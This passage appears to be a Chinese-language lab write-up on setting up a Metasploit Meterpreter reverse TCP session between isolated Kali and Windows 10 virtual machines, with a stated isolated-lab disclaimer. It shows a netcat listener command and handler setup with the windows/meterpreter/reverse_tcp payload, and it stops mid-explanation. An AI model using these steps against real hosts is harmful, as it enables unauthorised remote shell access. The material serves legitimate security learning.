Metasploit Meterpreter 反向连接实验:从 Payload 到会话建立的完整实践记录

发布时间:2026/9/30 5:15:17
Metasploit Meterpreter 反向连接实验:从 Payload 到会话建立的完整实践记录
Metasploit Meterpreter 反向连接实验:从 Payload 到会话建立的完整实践记录实验声明:本文所有操作均在本人搭建的隔离虚拟机实验环境中进行,仅用于网络安全学习与技术研究。请勿将本文中的 Payload、监听器或相关操作用于未经授权的主机。一、实验概述这次实验主要学习 Metasploit Framework 中Payload、Handler、Reverse TCP、Meterpreter Session之间的关系,并在两台虚拟机之间完成一次完整的 Meterpreter 反向连接实验。本次实验并不是直接使用漏洞攻击目标,而是手动生成一个 Payload,然后让 Windows 实验机主动连接 Kali 上的 Handler。整个实验流程可以概括为:Kali │ │ ① 生成 Payload ▼ test.exe │ │ ② 放入 Windows 实验机 ▼ Windows │ │ ③ 执行 Payload │ │ ④ 主动连接 Kali:4444 ▼ Kali Handler │ │ ⑤ 接收连接 ▼ Meterpreter Session │ ▼ meterpreter 二、实验环境本次实验使用两台虚拟机,并让它们处于同一个实验网络中。主机系统IP 地址作用Kali LinuxKali Linux192.168.142.128Metasploit / HandlerWindowsWindows 10 22H2192.168.142.131实验靶机最终的通信方向为:Windows 192.168.142.131 │ │ TCP 4444 ▼ Kali 192.168.142.128需要特别注意:这里使用的是反向连接(Reverse TCP),因此连接的发起方是 Windows,而监听方是 Kali。三、实验前网络连通性测试在正式开始 Metasploit 操作之前,首先需要确认两台虚拟机之间能够正常通信。3.1 Kali Ping Windows在 Kali 中执行:ping-c4192.168.142.131实验开始时,Kali 一开始无法 Ping 通 Windows。后来检查 Windows 防火墙,发现 Windows 的:文件和打印机共享(回显请求 - ICMPv4-In)入站规则没有开启。开启相应的 ICMPv4 入站规则后,再次执行:ping-c4192.168.142.131得到:4 packets transmitted, 4 received, 0% packet loss说明两台机器之间的 ICMP 通信已经正常。【图片 2:Windows 防火墙中启用 ICMPv4 入站规则】【图片 3:Kali Ping Windows 成功的终端截图】四、测试 TCP 4444 端口Ping 成功只能说明 ICMP 通信正常,并不能证明 TCP 端口也可以正常连接。因此继续测试 Windows → Kali 的 TCP/4444。首先在 Kali 上使用nc临时监听 4444:nc-lvnp4444然后在 Windows PowerShell 中执行:Test-NetConnection192.168.142.128-Port 4444结果:TcpTestSucceeded : True说明:Windows 192.168.142.131 │ │ TCP/4444 ▼ Kali 192.168.142.128这条 TCP 通信链路已经打通。【图片 4:Kali 使用 nc 监听 4444】【图片 5:Windows Test-NetConnection 测试成功】五、启动 Metasploit Handler确认网络正常以后,开始使用 Metasploit。首先进入:msfconsole然后选择 Handler 模块:use exploit/multi/handlerHandler 可以理解为一个“接收器”。它的职责不是主动去扫描 Windows,而是:等待已经生成好的 Payload 主动连接回来。5.1 设置 Payload 类型执行:set payload windows/meterpreter/reverse_tcp这一行可以拆开理解:windows表示目标平台为 Windows。meterpreter表示建立连接后使用 Meterpreter。reverse_tcp表示目标通过 TCP 主动连接回 Kali。因此:windows/meterpre